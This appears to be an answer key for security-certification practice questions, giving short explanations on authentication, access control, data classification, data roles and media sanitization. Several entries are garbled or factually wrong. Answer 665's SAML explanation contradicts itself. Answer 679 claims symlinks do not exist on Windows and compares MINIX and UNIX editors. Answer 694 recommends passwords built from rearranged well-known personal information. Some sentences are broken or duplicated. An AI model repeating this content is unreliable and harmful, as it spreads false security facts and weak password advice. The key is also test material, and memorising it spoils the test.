A. Electronic credentials are digital documents used in authentication that bind an identity or an attribute to a subscriber’s token. Security assertion markup language (SAML) is a specification for encoding security assertions in the extensible markup language (XML). SAML assertions have nothing to do with electronic credential because they can be used by a verifier to make a statement to a relying party about the identity of a claimant. An X.509 public-key identity certificate is incorrect because binding an identity to a public key is a common type of electronic credential. X.509 attribute certificate is incorrect because binding an identity or a public key with some attribute is a common type of electronic credential. Kerberos tickets are incorrect because encrypted messages binding the holder with some attribute or privilege is a common type of electronic credential.

Answer 665

C. Making it more difficult to accomplish or increasing the likelihood of detection can deter registration fraud. The goal is to make impersonation more difficult.

Answer 666

A. A discretionary access control (DAC) mechanism enables users to grant or revoke access to any of the objects under their control. As such, users are said to be the owners of the objects under their control. Users and owners are different in the other three choices.

Answer 667

A. Eavesdroppers are assumed to be physically able to intercept authentication protocol runs; however, the protocol may be designed to render the intercepted messages unintelligible, or to resist analysis that would allow the eavesdropper to obtain information useful to impersonate the claimant. Subscriber impostors are incorrect because they need only normal communications access to verifiers or relying parties. Impostor verifiers are incorrect because they may have special network capabilities to divert, insert, or delete packets. But, in many cases, such attacks can be mounted simply by tricking subscribers with incorrect links or e-mails or on Web pages, or by using domain names similar to those of relying parties or verifiers. Therefore, the impostors do not necessarily need to have any unusual network capabilities. Hijackers are incorrect because they must divert communications sessions, but this capability may be comparatively easy to achieve today when many subscribers use wireless network access.

Answer 668

D. An attacker can send attack packets using a fake source IP address but arrange to wiretap the victims reply to the fake address. The attacker can do this without having access to the computer at the fake address. This manipulation of IP addressing is called IP address spoofing. A system scanning attack occurs when an attacker probes a target network or system by sending different kinds of packets. Denial-of service attacks attempt to slow or shut down targeted network systems or services. System penetration attacks involve the unauthorized acquisition and/or alteration of system privileges, resources, or data.

Answer 669

C. In an in-band attack, the attacker assumes the role of a claimant with a genuine verifier. These include a password guessing attack and a replay attack. In a password guessing attack, an impostor attempts to guess a password in repeated logon trials and succeeds when he can log onto a system. In a replay attack, an attacker records and replays some part of a previous good protocol run to the verifier. In the verifier impersonation attack, the attacker impersonates the verifier and induces the claimant to reveal his secret token. A man-in-the-middle attack is an attack on the authentication protocol run in which the attacker positions himself between the claimant and verifier so that he can intercept and alter data traveling between them.

Answer 670

B. An access control list (ACL) is an object associated with a file and containing entries specifying the access that individual users or groups of users have to the file. ACLs provide a straightforward way to grant or deny access for a specified user or groups of users. Other choices are not that straightforward in that they use labels, tags, and roles.

Answer 671

B. Spoofing is an unauthorized use of legitimate identification and authentication data such as user IDs and passwords. Intercepted user names and passwords can be used to impersonate the user on the login or file transfer server host that the user accesses. Snooping and sniffing attacks are the same in that sniffing is observing the packet’s passing by on the network. Spamming is posting identical messages to multiple unrelated newsgroups on the Internet or sending unsolicited e-mail sent indiscriminately to multiple users.

Answer 672

B. A mandatory access control (MAC) restricts access to objects based on the sensitivity of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity.

Answer 673

C. Spoofing is using various techniques to subvert IP-based access control by masquerading as another system by using its IP address. Attacks such as hidden code, inference, and traffic analysis are based on data and information.

Answer 674

C. The honeypot system is instrumented with sensitive monitors, event triggers, and event loggers that detect unauthorized accesses and collect information about the attacker’s activities. These systems are filled with fabricated data designed to appear valuable.

Answer 675

B. Intrusion detection and prevention systems (IDPS) look for specific symptoms of intrusions and security policy violations dynamically. IDPS are analogous to security monitoring cameras. Vulnerability analysis systems take a static view of symptoms. Linearly and nonlinearly are not applicable here because they are mathematical concepts.

Answer 676

C. In biometrics, crossover error rate is defined as the point at which the false rejection rates and the false acceptance rates are equal. Type I error, called false rejection rate, is incorrect because genuine users are rejected as imposters. Type II error, called false acceptance rate, is incorrect because imposters are accepted as genuine users.

Answer 677

B. Separation of duties, job rotation, and mandatory vacations are management controls that can help in preventing fraud. Job enlargement and job enrichment do not prevent fraud because they are not controls; their purpose is to expand the scope of an employee’s work for a better experience and promotion.

Answer 678

C. The Clark-Wilson model partitions objects into programs and data for each subject forming a subject/program/data access triple. The generic model for the access triples is .

Answer 679

B. Symbolic links are links on UNIX, MINIX, and LINUX systems that point from one file to another file. A symlink vulnerability is exploited by making a symbolic link from a file to which an attacker does have access to a file to which the attacker does not have access. Symlinks do not exist on Windows systems, so symlink attacks cannot be performed against programs or files on those systems. MINIX is a variation of UNIX and is small in size. A major difference between MINIX and UNIX is the editor where the former is faster and the latter is slower

Answer 680

C . “What the user can do” is defined in access rules or user profiles, which come after a successful authentication. The other three choices are part of an authentication process.

Answer 681

C. For basic authentication, user IDs, passwords, and account numbers are used for internal authentication. Centralized authentication servers such as RADIUS and TACACS/TACACS+ can be integrated with token-based authentication to enhance firewall administration security.

Answer 682

C. Robust authentication means strong authentication that should be required for accessing internal computer systems. Robust authentication is provided by Kerberos, one-time passwords, challenge-response exchanges, digital certificates, and secure RPC. Reusable passwords provide weak authentication.

Answer 683

D. Continuous authentication protects against impostors (active attacks) by applying a digital signature algorithm to every bit of data sent from the claimant to the verifier. Also, continuous authentication prevents session hijacking. Static authentication uses reusable passwords, which can be compromised by replay attacks. Robust authentication includes one-time passwords and digital signatures, which can be compromised by session hijacking. Intermittent authentication is not useful because of gaps in user verification.

Answer 684

D. A two-factor authentication uses two different kinds of evidence. For example, a challenge-response token card typically requires both physical possession of the card (something you have, one factor) and a PIN (something you know, another factor). The other three choices have only one factor to authenticate.

Answer 685

D. A basic tenet of IT security is that individuals must be accountable for their actions. If this is not followed and enforced, it is not possible to successfully prosecute those who intentionally damage or disrupt systems or to train those whose actions have unintended adverse effects. The concept of individual accountability drives the need for many security safeguards, such as unique (user) identifiers, audit trails, and access authorization rules. Policies and procedures indicate what to accomplish and how to accomplish objectives. By themselves, they do not exact individual accountability

Answer 686

D Biometric systems require the creation and storage of profiles or templates of individuals wanting system access. This includes physiological attributes such as fingerprints, hand geometry, or retina patterns, or behavioral attributes such as voice patterns and hand written signatures. Memory tokens and smart tokens involve the creation and distribution of token/PINs and data that tell the computer how to recognize valid tokens or PINs. Cryptography requires the generation, distribution, storage, entry, use, distribution, and archiving of cryptographic keys.

Answer 687

A. Recurring passwords are static passwords with reuse and are considered to be a relatively weak security mechanism. Users tend to use easily guessed passwords. Other weaknesses include spoofing users, users stealing passwords through observing keystrokes, and users sharing passwords. The unauthorized use of passwords by outsiders (hackers) or insiders is a primary concern and is considered the least efficient and least effective security mechanism for re authentication. Nonrecurring passwords is incorrect because they provide a strong form of re-authentication. Examples include a challenge-response protocol or a dynamic password generator where a unique value is generated for each session. These values are not repeated and are good for that session only. Tokens can help in re-authenticating a user or transaction. Memory tokens store but do not process information. Smart tokens expand the functionality of a memory token by incorporating one or more integrated circuits into the token itself. In other words, smart tokens store and process information. Except for passwords, all the other methods listed in the question are examples of advanced authentication methods that can be applied to re authentication.

Answer 688

A. A private credential object links a user’s identity to a representation of the token in a way that the exposure of the credential to unauthorized parties can lead to any exposure of the token secret. A private credential can be used to derive, guess, or crack the value of the token secret or spoof the possession of the token. Therefore, it is important that the contents of the private credential be kept confidential (e.g., a hashed password values). Public credentials are shared widely, do not lead to an exposure of the token secret, and have little or no confidentiality requirements. Paper credentials are documents that attest to the identity of an individual (e.g., passports, birth certificates, and employee identity cards) and are based on written signatures, seals, special papers, and special inks. Electronic credentials bind an individual’s name to a token with the use of X.509 certificates and Kerberos tickets

Answer 689

B. Controlling access to the network is provided by the network’s identification and authentication services, which go together. This service is pivotal in providing controlled access to the resources and services offered by the network and in verifying that the mechanisms provide proper protection. Identification is the process that enables recognition of an entity by a computer system, generally by the use of unique machine-readable usernames. Authentication is the verification of the entity’s identification. That is when the host, to whom the entity must prove his identity, trusts (through an authentication process) that the entity is who he claims to be. The threat to the network that the identification and authentication service must protect against is impersonation. Access control list (ACL) and access privileges do not provide controlled access to networks because ACL is a list of the subjects that are permitted to access an object and the access rights (privileges) of each subject. This service comes after initial identification and authentication service. Certification and accreditation services do not provide controlled access to networks because certification is the administrative act of approving a computer system for use in a particular application. Accreditation is the management’s formal acceptance of the adequacy of a computer system’s security. Certification and accreditation are similar in concept. This service comes after initial identification and authentication service. Accreditation and assurance services do not provide controlled access to networks because accreditation is the management’s formal acceptance of the adequacy of a computer system’s security. Assurance is confidence that a computer system design meets its requirements. Again, this service comes after initial identification and authentication service.

Answer 690

A. Packet replay is one of the most common security threats to network systems, similar to impersonation and eavesdropping in terms of damage, but dissimilar in terms of functions. Packet replay refers to the recording and retransmission of message packets in the network. It is a significant threat for programs that require authenticationsequences because an intruder could replay legitimate authentication sequence messages to gain access to a system. Packet replay is frequently undetectable but can be prevented by using packet timestamping and packet-sequence counting. Forgery is incorrect because it is one of the ways an impersonation attack is achieved. Forgery is attempting to guess or otherwise fabricate the evidence that the impersonator knows or possesses. Relay is incorrect because it is one of the ways an impersonation attack is achieved. Relay is where one can eavesdrop upon another’s authentication exchange and learn enough to impersonate a user. Interception is incorrect because it is one of the ways an impersonation attack is achieved. Interception is where one can slip in between the communications and “hijack” the communications channel.

Answer 691

A. The purpose of a privilege mechanism is to provide a means of granting specific users or processes the ability to perform security relevant actions for a limited time and under a restrictive set of conditions, while still permitting tasks properly authorized by the system administrator. This is the underlying theme behind the security principle of least privilege. It does not imply an “all or nothing” privilege. The granularity of privilege is incorrect because it is one of the security features supported by the principle of least privilege. A privilege mechanism that supports granularity of privilege can enable a process to override only those security-relevant functions needed to perform the task. For example, a backup program needs to override only read restrictions, not the write or execute restriction on files. The time bounding of privilege is incorrect because it is one of the security features supported by the principle of least privilege. The time bounding of privilege is related in that privileges required by an application or a process can be enabled and disabled as the application or process needs them. Privilege inheritance is incorrect because it is one of the security features supported by the principle of least privilege. Privilege inheritance enables a process image to request that all, some, or none of its privileges get passed on to the next process image. For example, application programs that execute other utility programs need not pass on any privileges if the utility program does not require them.

Answer 692

C. No automated vulnerability-testing tool can ensure that system users have not disclosed their passwords; thus secrecy cannot be guaranteed. Password length can be tested to ensure that short passwords are not selected. Password lifetime can be tested to ensure that they have a limited lifetime. Passwords should be changed regularly or whenever they may have been compromised. Password storage can be tested to ensure that they are protected to prevent disclosure or unauthorized modification.

Answer 693

B. By definition, a static verification takes place only once at the start of each login session. Passwords may or may not be reusable. Dynamic verification of a user takes place when a person types on a keyboard and leaves an electronic signature in the form of keystroke latencies in the elapsed time between keystrokes. For well-known, regular type strings, this signature can be quite consistent. Here is how a dynamic verification mechanism works: When a person wants to access a computer resource, he is required to identify himself by typing his name. The latency vector of the keystrokes of this name is compared with the reference signature stored in the computer. If this claimant’s latency vector and the reference signature are statistically similar, the user is granted access to the system. The user is asked to type his name a number of times to provide a vector of mean latencies to be used as a reference. This can be viewed as an electronic signature of the user. Passwords do not provide a strong user authentication. If they did, there would not be a hacker problem today. Passwords provide the weakest user authentication due to their sharing and guessable nature. Only online systems require a user ID and password from a user due to their interactive nature. Only batch jobs and files require a user ID and password when submitting a job or modifying a file. Batch systems are not interactive.

Answer 694

D. Password selection is a difficult task to balance between password effectiveness and its remembrance by the user. The selected password should be simple to remember for oneself and difficult for others to know. It is no advantage to have a scientifically generated password if the user cannot remember it. Using randomly generated characters as a password is not only difficult to remember but also easy to publicize. Users will be tempted to write them down in a conspicuous place if the password is difficult to remember. The approaches in the other three choices would be relatively easy to remember due to the user familiarity with the password origin. A simple procedure is to use well-known personal information that is rearranged.

Answer 695

Physical Data link Network Transport Session Presentation Application

Answer 696

1 Physical

Answer 697

2 Data Link

Answer 698

4 Tranport

Answer 699

6 Presentation

Answer 700

7 Application

Answer 701

(I prefer counting euros as prime dollar) Forensic Investigation Process Identification Preservation Collection Examination Analysis Presentation Decision

Answer 702

(I prefer counting euros as prime dollar) Forensic Investigation Process Identification Preservation Collection Examination Analysis Presentation Decision

Answer 703

(Re Do Damn Test Right) Software Development Life Cycle 1. Req Gather 2. Design 3. Develop 4. Test 5. Release

Answer 704

Business Continuity Plan (BCP) (I believe people retain concepts through memory) 1. Initiation 2. BIA (Impact) 3. Preventative 4. Recovery 5. Continuity 6. Test 7. Manage/Maintain

Answer 705

Trans border protection deal

Answer 706

The pad is used to encrypt contents, the passcode is used to control access

Answer 707

End-to-end encryption is a possibility

Answer 708

End-to-end encryption is a possibility

Answer 709

A standard

Answer 710

Single factor If the application itself authenticates users using biometrics only (something you are), it’s considered single factor.

Answer 711

Response Detection and Reporting is the correct choice in this scenario because that is where the intake of complaints and suspicious events would occur. Assessment and Decision would not be the right choice because this is where analysis and evaluation of evidence occurs (from an incident already reported). Response would not be the right choice because this is where Containment, Eradication and Recovery occur. Analysis would not be the right choice because this is a distractor.

Answer 712

Physical and Datalink The key term is “card”. The card has both a physical “bit pushing” and a datalink component.

Answer 713

Degaussing

Answer 714

Destruction

Answer 715

Top Secret

Answer 716

Unclassified

Answer 717

Unclassified

Answer 718

Confidential/Proprietary

Answer 719

Data Owner

Answer 720

Data Owner

Answer 721

Data Custodian

Answer 722

Data Custodian

Answer 723

Data Admins

Answer 724

Business/Mission Owners

Answer 725

Business/Mission Owners

Answer 726

Asset Owners

Answer 727

Data Processor

Answer 728

Data Controller

Answer 729

Data Transfer

Answer 730

Anonymization

Answer 731

Pseudonymization

Answer 732

Data classifications provide strong protection against the loss of confidentiality and are the best choice of the available answers. Data labels and proper data handling are based on first identifying data classifications. Data degaussing methods apply only to magnetic media.

Answer 733

D. Backup media should be protected with the same level of protection afforded the data it contains, and using a secure offsite storage facility would ensure this. The media should be marked, but that won’t protect it if it is stored in an unstaffed warehouse. A copy of backups should be stored offsite to ensure availability if a catastrophe affects the primary location. If copies of data are not stored offsite or offsite backups are destroyed, security is sacrificed by risking availability.

Answer 734

B. Destruction is the final stage in the lifecycle of backup media. Because the backup method is no longer using tapes, they should be destroyed. Degaussing and declassifying the tape is done if you plan to reuse it. Retention implies you plan to keep the media, but retention is not needed at the end of its lifecycle

Answer 735

C. The data owner is the person responsible for classifying data. A data controller decides what data to process and directs the data processor to process the data. A data custodian protects the integrity and security of the data by performing day-to-day maintenance. Users simply access the data.

Answer 736

A. The data custodian is responsible for the tasks of implementing the protections defined by the security policy and senior management. A data controller decides what data to process and how. Data users are not responsible for implementing the security policy protections. A data processor controls the processing of data and only does what the data controller tells them to do with the data.

Answer 737

D. The company can implement a data collection policy of minimization to minimize the amount of data they collect and store. If they are selling digital products, they don’t need the physical address. If they are reselling products to the same customers, they can use tokenization to save tokens that match the credit card data, instead of saving and storing credit card data. Anonymization techniques remove all personal data and make the data unusable for reuse on the website. Pseudonymization replaces data with pseudonyms. Although the process can be reversed, it is not necessary.

Answer 738

B. Security labeling identifies the classification of data such as sensitive, secret, and so on. Media holding sensitive data should be labeled. Similarly, systems that hold or process sensitive data should also be marked. Many organizations require the labeling of all systems and media, including those that hold or process non sensitive data.

Answer 739

B. A data subject is a person who can be identified by an identifier such as a name, identification number, or other PII. All of these answers refer to the General Data Protection Regulation (GDPR). A data owner owns the data and has ultimate responsibility for protecting it. A data controller decides what data to process and how it should be processed. A data processor processes the data for the data controller.

Answer 740

B. Personnel did not follow the record retention policy for the backups sent to the warehouse. The scenario states that administrators purge onsite emails older than six months to comply with the organization’s security policy, but the leak was from emails sent over three years ago. Personnel should follow media destruction policies when the organization no longer needs the media, but the issue here is the data on the tapes. Configuration management ensures that systems are configured correctly using a baseline, but this does not apply to backup media. Versioning applies to applications, not backup tapes.

Answer 741

D. Record retention policies define the amount of time to keep data, and laws or regulations often drive these policies. Data remanence is data remnants on media, and proper data destruction procedures remove data remnants. Laws and regulations do outline requirements for some data roles, but they don’t specify requirements for the data user role.

Answer 742

D. Purging is the most reliable method among the given choices. Purging overwrites the media with random bits multiple times and includes additional steps to ensure that data is removed. It ensures there isn’t any data remanence. Erasing or deleting processes rarely remove the data from media but instead mark it for deletion. Solid-state drives (SSDs) do not have magnetic flux, so degaussing an SSD doesn’t destroy data

Answer 743

12. A. Overwriting the disks multiple times will remove all existing data. This is called purging, and purged media can then be used again. Formatting the disks isn’t secure because it doesn’t typically remove the previously stored data. Degaussing the disks often damages the electronics but doesn’t reliably remove the data. Defragmenting a disk optimizes it, but it doesn’t remove data.

Answer 744

D. Systems with an EOS date that occurs in the following year should be a top priority for replacement. The EOS date is the date that the vendor will stop supporting a product. The EOL date is the date that a vendor stops offering a product for sale, but the vendor continues to support the product until the EOS date. Systems used for data loss prevention or to process sensitive data can remain in service.

Answer 745

D. Purging memory buffers removes all remnants of data after a program has used it. Asymmetric encryption (along with symmetric encryption) protects data in transit. The data is already encrypted and stored in the database. The scenario doesn’t indicate that the program modified the data, so there’s no need to overwrite the existing data in the database. Data loss prevention methods prevent unauthorized data loss but do not protect data in use.

Answer 746

A. Symmetric encryption methods protect data at rest, and data at rest is any data stored on media, such as a server. Data in transit is data transferred between two systems. Data in use is data in memory that is used by an application. Steps are taken to protect data from the time it is created to the time it is destroyed, but this question isn’t related to the data lifecycle.

Answer 747

B. Scoping is a part of the tailoring process and refers to reviewing a list of security controls and selecting the security controls that apply. Tokenization is the use of a token, such as a random string of characters, to replace other data and is unrelated to this question. Note that scoping focuses on the security of the system and tailoring ensures that the selected controls align with the organization’s mission. If the database server needs to comply with external entities, it’s appropriate to select a standard baseline provided by that entity. Imaging is done to deploy an identical configuration to multiple systems, but this is typically done after identifying security controls.

Answer 748

A. Tailoring refers to modifying a list of security controls to align with the organization's mission. The IT administrators identified a list of security controls to protect the web farm during the scoping steps. Sanitization methods (such as clearing, purging, and destroying) help ensure that data cannot be recovered and is unrelated to this question. Asset classification identifies the classification of assets based on the classification of data the assets hold or process. Minimization refers to data collection. Organizations should collect and maintain only the data they need.

Answer 749

A. A cloud access security broker (CASB) is software placed logically between users and cloud-based resources, and it can enforce security policies used in an internal network. Data loss prevention (DLP) systems attempt to detect and block data exfiltration. CASB systems typically include DLP capabilities. Digital rights management (DRM) methods attempt to provide copyright protection for copyrighted works. End-of-life (EOL) is generally a marketing term and indicates when a company stops selling a product.

Answer 750

B. Network-based data loss prevention (DLP) systems can scan outgoing data and look for specific keywords and/or data patterns. DLP systems can block these outgoing transmissions. Antimalware software detects malware. Security information and event management (SIEM) provides real-time analysis of events occurring on systems throughout an organization but doesn’t necessarily scan outgoing traffic. Intrusion prevention systems (IPSs) scan incoming traffic to prevent unauthorized intrusions.

Answer 751

B, C, D. Persistent online authentication, automatic expiration, and a continuous audit trail are all methods used with digital rights management (DRM) technologies. Virtual licensing isn’t a valid term within DRM

Answer 752

D. A third-party payroll company is an Incorrect answers and explanations: Answers A, B, and C are incorrect. A data controller is someone who creates PII, such as an HR department. “Data handler” is not a formal term and is a distractor answer. A data owner is a management employee responsible for assuring that specific data is protected.

Answer 753

D. A system owner is responsible for the actual computers that house data, including the security of hardware and software configurations. Incorrect answers and explanations: Answers A, B, and C are incorrect. A custodian is a nonmanager who provides hands-on protection of assets. A data owner is a manager responsible for assuring that specific data is protected. A mission owner is a member of senior management who creates the information security program and ensures that it is properly staffed and funded and has the appropriate organizational priority.

Answer 754

B. Degaussing destroys the integrity of magnetic media, such as tapes or disk drives, and the data they contain by exposing them to a strong magnetic field. Incorrect answers and explanations: Answers A, C, and D are incorrect. A bit level overwrite removes data by overwriting every sector of a disk. Destruction physically destroys data; for example, via incineration. Shredding electronic data involves overwriting a file’s contents before deleting the file.

Answer 755

C. SRAM is relatively expensive and fast memory that uses small latches called “flip-flops” to store bits. Incorrect answers and explanations: Answers A, B, and D are incorrect. DRAM is relatively inexpensive memory that uses capacitors. EPROM may be erased with ultraviolet light. A SSD is a combination of DRAM and EEPROM.

Answer 756

A. DRAM stores bits in small capacitors (like small batteries). Incorrect answers and explanations: Answers B, C, and D are incorrect. EPROM may be erased with ultraviolet light. SRAM is relatively expensive and fast memory that uses small latches called “flip-flops” to store bits. A SSD is a combination of DRAM and EEPROM

Answer 757

Target of evaluation (ToE)

Answer 758

Security target

Answer 759

Protection profile

Answer 760

Evaluation assurance level (EAL)

Answer 761

Monitor and Evaluate

Answer 762

Plan and Organize

Answer 763

Acquire and Implement

Answer 764

Deliver and Support

Answer 765

Service Strategy

Answer 766

Service Design

Answer 767

Service Transition

Answer 768

Service Operation

Answer 769

Continual Service Improvement

Answer 770

Answer: C. Enterprise owners Explanation: Enterprise or business owners are the most likely to select and apply the COBIT framework. COBIT allows them to govern and manage the IT environment to ensure that business needs, such as risk management, resource optimization, and value creation, are met effectively. While all roles may interact with COBIT somehow, the business owners are primarily responsible for aligning security controls with business requirements. Data processors, information stewards, and data custodians focus more on the operational aspects of data and may not be involved in strategic decision-making processes like selecting a governance framework.

Answer 771

Answer: B. A Cloud Access Security Broker (CASB) Explanation: A Cloud Access Security Broker (CASB) is a tool that sits between cloud service consumers and cloud service providers to enforce security, compliance, and governance policies for cloud applications. It can help monitor and secure the hybrid cloud environment.

Answer 772

Answer: B. The media is tagged based on the highest classification tier of the data it accommodates. Explanation: When labeling media based on the classification of the data it contains, the rule typically applied is to label it based on the highest classification level of the data. This ensures the most restrictive and appropriate controls are applied to protect the entire dataset.

Answer 773

Answer: A. Data categorization Explanation: Data classification, or categorization, is an administrative process that involves sorting data into categories based on its sensitivity level. This aids organizations in assigning appropriate levels of security controls to sensitive information, ensuring that each type of data is adequately protected according to its value and sensitivity

Answer 774

Answer: A. Personally Identifiable Information (PII) Explanation: Personally Identifiable Information (PII) is any data that could identify a specific individual. It includes any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother’s maiden name, or biometric records.

Answer 775

Answer: B. Data breach Explanation: A data breach involving unauthorized access and retrieval of sensitive information often has the most significant reputational impact on an organization. It can lead to losing trust among customers and stakeholders, legal repercussions, and financial losses.

Answer 776

Answer: B. Data at rest Explanation: Full disk encryption tools like BitLocker are used to protect data at rest, that is, data that is stored on physical or virtual disk drives, storage devices, or other types of media.

Answer 777

Answer: B. Planned obsolescence Explanation: Planned obsolescence is a policy of planning or designing a product with an artificially limited useful life or a purposely frail design, so it becomes outdated or nonfunctional after a certain period. In this case, even though the phones are still operational and receiving updates, they are replaced every two years. This is a form of planned obsolescence, where the company ensures that the old devices are phased out and replaced, even though they might still be usable. EOL is when the device is no longer suitable for use and is discarded. EOS means that the manufacturer has stopped EOS means that the manufacturer has stopped providing updates or fixes for the product. Device risk management is a process to identify, assess, and prioritize the risks associated with using devices in an organization. None of these options describes the scenario as accurately as planned obsolescence.

Answer 778

Answer: D. It identifies the value of the data to the organization. Explanation: The primary purpose of data classification is to identify the value of the data to the organization. This process involves categorizing data based on its sensitivity level and importance to the organization, which helps implement appropriate security controls and handling procedures.

Answer 779

Answer: D. Asset and information classification Explanation: Identifying and classifying information and assets is a key step in managing security risks. This process helps prioritize resources, apply appropriate protections, and comply with legal and regulatory requirements.

Answer 780

Answer: B. Data classification Explanation: Data classification categorizes data into types, forms, or other distinct classes. This classification may be based on data sensitivity such as private, confidential, public, or the data’s importance to the organization.

Answer 781

Answer: B. Asset classification Explanation: Asset classification defines an organization’s assets based on their criticality, sensitivity, and other factors. This helps organizations apply appropriate security measures and prioritize their resources.

Answer 782

Answer: B. Setting information and asset handling guidelines Explanation: Establishing information and asset handling requirements means setting up policies and procedures determining how data and assets should be managed, stored, transmitted, and disposed of. This is an essential part of an organization’s information security strategy, helping to ensure that sensitive information and valuable assets are appropriately protected.

Answer 783

Answer: A. Asset management and secure provisioning Explanation: Asset management and secure provisioning encompass the secure allocation of resources, identifying and assigning ownership of information and assets, and maintaining a comprehensive inventory of tangible and intangible assets. This helps provide an organized view of the company’s resources and assists in maintaining proper security controls.

Answer 784

Answer: D. Data custodian Explanation: A data custodian is responsible for the data’s safe custody, transport, and storage. They maintain the integrity, confidentiality, and availability of the data.

Answer 785

Answer: B. Data remanence Explanation: Data remanence is the residual representation of data nominally erased or removed.

Answer 786

Answer: C. Data collection Explanation: Data collection is the process of gathering and measuring information on targeted variables in an established system, enabling one to answer relevant questions and evaluate outcomes. Answer: B Data retention

Answer 787

Answer: B. Data retention Explanation: Data retention involves policies and strategies to keep data for compliance or business reasons. After the predetermined period, the data is discarded.

Answer 788

Answer: B. Data maintenance Explanation: Data maintenance involves maintaining data assets by ensuring data accuracy, consistency, and reliability throughout its life cycle.

Answer 789

Answer: D. Data owner Explanation: The data owner is typically a senior executive with legal authority and responsibility for a dataset.

Answer 790

Answer: B. Data location Explanation: Data location refers to the physical or virtual place where data is stored, such as in house servers, data centers, or cloud storage.

Answer 791

Answer: C. Data processor Explanation: A data processor is responsible for processing personal data on behalf of the controller.

Answer 792

Answer: C. Data destruction Explanation: Data destruction is destroying data stored on tapes, hard disks, and other electronic media so that it is completely unreadable and cannot be accessed or used for unauthorized purposes.

Answer 793

Answer: C. Data controller Explanation: The data controller is the person (or business) who determines the purposes for which and how personal data is processed. They are responsible for establishing practices and policies in line with regulations to protect the data they are handling.

Answer 794

Answer: C. The time when an asset is no longer useful for the organization and is disposed of Explanation: EOL generally refers to a stage in the asset’s life cycle when it is no longer beneficial or productive for the organization. This could be due to obsolescence, failure, or when it is more cost effective to replace the asset than to continue maintaining it.

Answer 795

Answer: B. The software may no longer receive security updates and patches Explanation: When software reaches its EOS stage, the manufacturer or provider typically stops providing updates, patches, or fixes, including security-related ones. This can leave the software vulnerable to security threats and affect compliance with certain regulations.

Answer 796

Answer: C. To ensure compliance with legal and regulatory requirements for data retention Explanation: Asset retention policies are primarily designed to ensure that organizations comply with applicable legal and regulatory requirements. These requirements often specify how long certain data types must be retained and how they should be securely disposed of when no longer needed.

Answer 797

Answer: C. To prevent unauthorized access or data breaches Explanation: When an asset reaches its End-of Life (EOL) stage, it’s crucial to ensure that all data on the asset is either transferred or destroyed appropriately. If not managed correctly, it can lead to unauthorized access or data breaches, which can have significant consequences for the organization.

Answer 798

Answer: D. Evaluate risks associated with continued use and plan for their replacement or upgrade Explanation: When assets reach their EOS stage, evaluating the risks associated with their continued use is essential. These might include security vulnerabilities due to a lack of updates or incompatibility issues with other systems. Based on this evaluation, a plan should be made for replacing or upgrading the assets.

Answer 799

Answer: B. In use, in transit, and at rest Explanation: The three states of data that need to be considered when securing data are “in use” (data being processed), “in transit” (data being moved from one location to another), and “at rest” (data that is stored).

Answer 800

Answer: A. To customize security controls to fit the specific needs of the organization Explanation: Scoping and tailoring is adjusting a set of standard security controls to fit an organization’s specific needs better. This may involve adding, modifying, or removing specific controls based on the organization’s unique risk environment and business requirements.

Answer 801

Answer: D. All of the above Explanation: DRM is a technology used to protect digital media copyrights. It can prevent unauthorized access, track digital media usage, and control how digital media is shared.

Answer 802

Answer: D. All of the above Explanation: A CASB is a software tool or service between an organization’s on-premises and cloud provider’s infrastructure. A CASB can provide various services, including encrypting data, monitoring for malicious activity and enforcing monitoring for malicious activity, and enforcing security compliance policies.

Answer 803

Answer: A. To prevent data breaches by detecting potential data breach/data ex-filtration transmissions Explanation: DLP ensures that end users do not send sensitive or critical information outside the corporate network. The term also describes software products that help a network administrator control what data end users can transfer.

Answer 804

Answer: D. Conducting data classification Explanation: Data classification involves analyzing an organization’s data, determining its importance and value, and then categorizing it accordingly. This process is crucial for effective data management and protection.

Answer 805

Answer: C. Purging Explanation: Purging refers to securely removing sensitive data from storage devices so that it cannot be recovered using normal system functions or software file/data recovery utilities.

Answer 806

Answer: A. File encryption software Explanation: File encryption software allows for the encryption of specific files, providing flexibility in securing particular data elements.

Answer 807

Answer: D. Curie temperature Explanation: The Curie temperature is the critical point where a material’s intrinsic magnetic alignment changes direction. This concept is relevant in data storage technologies that use magnetic storage media.

Answer 808

Answer: C. Serving as data custodians Explanation: Data custodians ensure that important datasets are developed, maintained, and accessible within their specifications. This role is crucial in an organization’s overall data management and protection strategy.

Answer 809

Answer: A. Confidential Explanation: The US government ranks the sensitivity of information into several levels: Top Secret, Secret, and Confidential. Of these, Confidential is considered the lowest level of sensitivity.

Answer 810

Answer: C. GDPR Explanation: The General Data Protection Regulation (GDPR) is the primary law in Europe regulating how companies protect EU citizens’ personal data.

Answer 811

Answer: A. Data in motion Explanation: The Transport Layer Security (TLS) protocol is primarily designed to provide privacy and data integrity between two or more communicating computer applications, making it suitable for securing data in motion.

Answer 812

Answer: C. SSH Explanation: SSH (Secure Shell) is a secure protocol that can replace Telnet for secure server management.

Answer 813

Answer: D. Erasing Explanation: Of the methods listed, erasing is generally the least secure method for data removal from magnetic media. It simply removes pointers to the data but doesn’t physically erase them.

Answer 814

Answer: A. RAM Explanation: RAM (Random Access Memory) is a type of computer memory used to read and write data that is being actively used or processed by the computer. Hence, it is an example of “data in use.”

Answer 815

Answer: B. Home address Explanation: A home address can identify an individual even when seen in isolation. Hence, it is considered PII.

Answer 816

Answer: D. System owner Explanation: The system owner, or information system owner or information owner, is typically responsible for the overall procurement, development, integration, modification, or operation and maintenance of the information system. When there is a significant change in the system, they are primarily responsible for updating the system security plan (SSP). This includes documenting changes in the system environment, updating the system inventory, and reevaluating the security controls. The business owner, data processor, and data owner also have crucial roles in the organization but are not primarily responsible for the SSP. The business owner usually oversees the business process that the system supports. The data processor processes data on behalf of the data owner, who is responsible for the data’s accuracy, privacy, and security.

Answer 817

Answer: B. Value of the data Explanation: The value of the data, in terms of its sensitivity and the impact if it were compromised, is the most important factor when determining a data classification level.

Answer 818

Answer: A. AES Explanation: Advanced Encryption Standard (AES) is used for encrypting files, and it keeps the file encrypted even after it is received and detached from the email. While TLS and SSL secure communication channels, they do not encrypt the file, so it would not remain encrypted after receipt. Though it can encrypt files, DES is considered insecure due to its small key size.

Answer 819

50. Answer: B. Mandatory access control Explanation: Mandatory access control (MAC) is a nondiscretionary access control policy regulated by a central authority. It’s based on security labels attached to each information object, and access is granted or denied based on the security clearances assigned to users.

Answer 820

